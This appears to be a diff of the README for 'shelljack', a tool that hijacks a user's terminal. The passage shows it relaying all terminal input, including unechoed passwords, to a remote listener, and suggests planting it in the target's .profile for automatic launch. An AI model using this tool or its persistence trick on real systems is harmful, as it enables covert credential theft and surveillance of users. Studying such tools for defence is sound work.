emptymonkey/shelljack/README.md

 Back at the listener, you will now see all the I/O in real time as the user interacts with the shelljacked shell.
 For further evidence of this, lets go examine the target shell again:

-	empty@monkey:~$ ls -apl /proc/$$/fd
+	empty@monkey:~$ ls -l /proc/$$/fd
 	total 0
-	dr-x------ 2 empty empty  0 Jun 16 16:17 ./
-	dr-xr-xr-x 8 empty empty  0 Jun 16 16:17 ../
 	lrwx------ 1 empty empty 64 Jun 16 16:17 0 -> /dev/pts/4
 	lrwx------ 1 empty empty 64 Jun 16 16:18 1 -> /dev/pts/4
 	lrwx------ 1 empty empty 64 Jun 16 16:18 2 -> /dev/pts/4
 	lrwx------ 1 empty empty 64 Jun 16 16:18 255 -> /dev/pts/4
 	empty@monkey:~$ ps j -u empty | grep $$
 	19714 19716 19716 19716 pts/4    19867 Ss    1000   0:00 -bash
-	    1 19782 19782 19782 pts/3    19782 Ss+   1000   0:00 ./shelljack localhost 9999 19716
+	    1 19782 19782 19782 pts/3    19782 Ss+   1000   0:00 shelljack localhost 9999 19716

-Finally, we can see that _shelljack_ has successfully taken over /dev/pts/3, and is now serving up /dev/pts/4 for the target shell to consume.
-It sits as the quintessential mitm, and will happily forward you a copy of everything it sees.
-(Yes, even with "[echo off](http://linux.die.net/man/1/stty)".)
+We can see that _shelljack_ has successfully taken over /dev/pts/3, and is serving up /dev/pts/4 for the target shell to consume.
+It's now in place to mitm the traffic, happily forwarding you a copy of everything it sees, including the input which normally wouldn't be "[echoed](http://linux.die.net/man/1/stty)" to the terminal (e.g. passwords).

 Also note, _shelljack_ was designed with the ability to attack the shell that is calling it.
-This makes it ideal for launching out of the targets login shell through its [configuration files](http://en.wikipedia.org/wiki/.profile#Configuration_files_for_shells).
+This makes it ideal for launching it out of the targets login [configuration files](http://en.wikipedia.org/wiki/Unix_shell#Configuration_files_for_shells). (e.g. .profile)

 	empty@monkey:~$ ls -l /proc/$$/fd
 	total 0